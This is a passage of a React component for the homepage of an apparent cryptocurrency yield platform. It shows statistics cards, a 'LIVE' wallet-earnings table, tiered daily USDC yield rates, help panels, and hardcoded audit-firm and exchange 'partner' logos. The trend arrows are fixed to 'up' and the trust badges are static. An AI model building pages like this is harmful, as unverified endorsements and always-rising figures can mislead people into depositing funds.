                    <span className="trend-icon">↑</span>
                  </div>
                </div>
              </Card>

              <Card className="stat-card active-users" style={cardStyles.card}>
                <div className="stat-content">
                  <div className="stat-info">
                    <div className="stat-label">{t('common.activeUsers')}</div>
                    <div className="stat-value">
                      <span className="number">{statistics.active_users.toLocaleString('en-US')}</span>
                    </div>
                  </div>
                  <div className="stat-trend">
                    <span className="trend-icon">↑</span>
                  </div>
                </div>
              </Card>

              <Card className="stat-card total-profits" style={cardStyles.card}>
                <div className="stat-content">
                  <div className="stat-info">
                    <div className="stat-label">{t('common.totalProfits')}</div>
                    <div className="stat-value">
                      <span className="currency">$</span>
                      <span className="number">{statistics.total_profits.toLocaleString('en-US', { minimumFractionDigits: 6, maximumFractionDigits: 6 })}</span>
                    </div>
                  </div>
                  <div className="stat-trend">
                    <span className="trend-icon">↑</span>
                  </div>
                </div>
              </Card>
            </div>
          </div>
        </Col>

        {/* 用户收益 */}
        <Col span={24}>
          <div className="user-earnings-card" style={cardStyles.userEarnings}>
            <div className="earnings-title-container">
              <div className="earnings-title">
                <Title level={3} className="earnings-title-text">{t('common.userEarnings')}</Title>
                <div className="title-badge">LIVE</div>
              </div>
            </div>
            <div className="earnings-table-container">
              <Table
                className="earnings-table"
                columns={[
                  {
                    title: (
                      <div className="column-header">
                        <span className="header-icon">👤</span>
                        {t('common.walletAddress')}
                      </div>
                    ),
                    dataIndex: 'address',
                    key: 'address',
                    render: (text) => (
                      <div className="wallet-address-cell">
                        <span className="wallet-icon">👛</span>
                        <span className="address-text">{text}</span>
                      </div>
                    ),
                  },
                  {
                    title: (
                      <div className="column-header">
                        <span className="header-icon">💰</span>
                        {t('common.earningsAmount')}
                      </div>
                    ),
                    dataIndex: 'earnings',
                    key: 'earnings',
                    align: 'right',
                    render: (text) => (
                      <div className="earnings-cell">
                        <span className="earnings-value">${parseFloat(text).toFixed(6)}</span>
                        <span className="earnings-trend">↑</span>
                      </div>
                    ),
                  },
                ]}
                dataSource={userEarnings}
                pagination={false}
                size="middle"
              />
            </div>
          </div>
        </Col>

        {/* 帮助中心 */}
        <Col span={24}>
          <div className="guide-section">
            <div className="guide-section-header">
              <Title level={3} className="guide-section-title">{t('common.helpCenter')}</Title>
            </div>
            <Row gutter={[0, 0]}>
              <Col span={24}>
                <Collapse defaultActiveKey={['1']} className="guide-collapse" style={cardStyles.collapse}>
                  <Panel 
                    header={
                      <div className="guide-panel-header">
                        <span>{t('common.howToJoin')}</span>
                      </div>
                    } 
                    key="1" 
                    className="guide-panel"
                    style={cardStyles.panel}
                  >
                    <div className="guide-content">
                      <Text>
                        {t('common.howToJoinDescription')}
                      </Text>
                    </div>
                  </Panel>
                  <Panel 
                    header={
                      <div className="guide-panel-header">
                        <span>{t('common.howToWithdraw')}</span>
                      </div>
                    } 
                    key="2" 
                    className="guide-panel"
                    style={cardStyles.panel}
                  >
                    <div className="guide-content">
                      <Text>
                        {t('common.howToWithdrawDescription')}
                      </Text>
                    </div>
                  </Panel>
                  <Panel 
                    header={
                      <div className="guide-panel-header">
                        <span>{t('common.howToBorrow')}</span>
                      </div>
                    } 
                    key="3" 
                    className="guide-panel"
                    style={cardStyles.panel}
                  >
                    <div className="guide-content">
                      <Text>
                        {t('common.howToBorrowDescription')}
                      </Text>
                    </div>
                  </Panel>
                  <Panel 
                    header={
                      <div className="guide-panel-header">
                        <span>{t('common.howToCalculateProfit')}</span>
                      </div>
                    } 
                    key="4" 
                    className="guide-panel"
                    style={cardStyles.panel}
                  >
                    <div className="guide-content">
                      <div className="profit-rules">
                        <Text className="profit-title">{t('common.profitTitle')}</Text>
                        <div className="profit-rules-list">
                          {profitRules.map((rule) => (
                            <div key={rule.id} className="profit-rule-item">
                              <Text>
                                {rule.min_num} - {rule.max_num} USDC，{t('common.dailyYieldRate')} {rule.bilv}%
                              </Text>
                            </div>
                          ))}
                        </div>
                        <Text className="profit-description" style={{ marginTop: '16px', display: 'block' }}>
                          {t('common.profitDescription')}
                        </Text>
                      </div>
                    </div>
                  </Panel>
                </Collapse>
              </Col>
            </Row>
          </div>
        </Col>

        {/* 审核报告模块 */}
        <Col span={24}>
          <div className="audit-section">
            <Row gutter={[0, 0]}>
              <Col span={24}>
                <div className="audit-section-header">
                  <Title level={3} className="audit-section-title">{t('common.auditReport')}</Title>
                  <Text type="secondary" className="audit-section-subtitle">{t('common.auditReportSubtitle')}</Text>
                </div>
                <Card className="audit-card" style={cardStyles.card}>
                  <div className="audit-content">
                    <div className="audit-item">
                      <SafetyCertificateOutlined className="audit-icon" />
                      <div className="audit-info">
                        <Text strong>{t('common.securityAudit')}</Text>
                        <Text type="secondary">{t('common.securityAuditDescription')}</Text>
                      </div>
                    </div>
                    <div className="audit-item">
                      <BankOutlined className="audit-icon" />
                      <div className="audit-info">
                        <Text strong>{t('common.complianceCertification')}</Text>
                        <Text type="secondary">{t('common.complianceDescription')}</Text>
                      </div>
                    </div>
                    <div className="audit-item">
                      <ExperimentOutlined className="audit-icon" />
                      <div className="audit-info">
                        <Text strong>{t('common.smartContractAudit')}</Text>
                        <Text type="secondary">{t('common.smartContractDescription')}</Text>
                      </div>
                    </div>
                  </div>
                  <div className="audit-logos">
                    <div className="audit-logos-row">
                      <a href="https://www.fairyproof.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                        <img src="/images/fairyproof.png" alt="Fairyproof" className="audit-logo" />
                        <span className="logo-text">Fairyproof</span>
                      </a>
                      <a href="https://www.certik.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                        <img src="/images/certik.png" alt="Certik" className="audit-logo" />
                        <span className="logo-text">Certik</span>
                      </a>
                      <a href="https://www.slowmist.io" target="_blank" rel="noopener noreferrer" className="logo-link">
                        <img src="/images/slowmist.png" alt="SlowMist" className="audit-logo" />
                        <span className="logo-text">SlowMist</span>
                      </a>
                    </div>
                    <a href="https://ethereum.org" target="_blank" rel="noopener noreferrer" className="ethereum-link">
                      <img src="/images/ethereum.png" alt="Ethereum" className="audit-logo" />
                      <span className="link-text">{t('common.visitEthereum')}</span>
                    </a>
                  </div>
                </Card>
              </Col>
            </Row>
          </div>
        </Col>

        {/* 合作伙伴模块 */}
        <Col span={24}>
          <div className="partners-section">
            <Row gutter={[0, 0]}>
              <Col span={24}>
                <div className="partners-section-header">
                  <Title level={3} className="partners-section-title">{t('common.partners')}</Title>
                  <Text type="secondary" className="partners-section-subtitle">{t('common.partnersSubtitle')}</Text>
                </div>
                <Card className="partners-card" style={cardStyles.card}>
                  <div className="partners-content">
                    <div className="partners-logos">
                      <div className="partners-logos-row">
                        <a href="https://www.binance.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                          <img src="/images/binance.png" alt="Binance" className="partner-logo" />
                          <span className="logo-text">Binance</span>
                        </a>
                        <a href="https://www.coinbase.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                          <img src="/images/coinbase.png" alt="Coinbase" className="partner-logo" />
                          <span className="logo-text">Coinbase</span>
                        </a>
                        <a href="https://www.kraken.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                          <img src="/images/kraken.png" alt="Kraken" className="partner-logo" />
                          <span className="logo-text">Kraken</span>
                        </a>
                      </div>
                      <div className="partners-logos-row">
                        <a href="https://www.huobi.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                          <img src="/images/huobi.png" alt="Huobi" className="partner-logo" />
                          <span className="logo-text">Huobi</span>
                        </a>
                        <a href="https://www.okx.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                          <img src="/images/okx.png" alt="OKX" className="partner-logo" />
                          <span className="logo-text">OKX</span>
                        </a>
                        <a href="https://www.bybit.com" target="_blank" rel="noopener noreferrer" className="logo-link">
                          <img src="/images/bybit.png" alt="Bybit" className="partner-logo" />
                          <span className="logo-text">Bybit</span>
                        </a>
                      </div>
                    </div>
                  </div>
                </Card>
              </Col>
            </Row>
          </div>
        </Col>
      </Row>
    </div>
  );
};

export default Home; 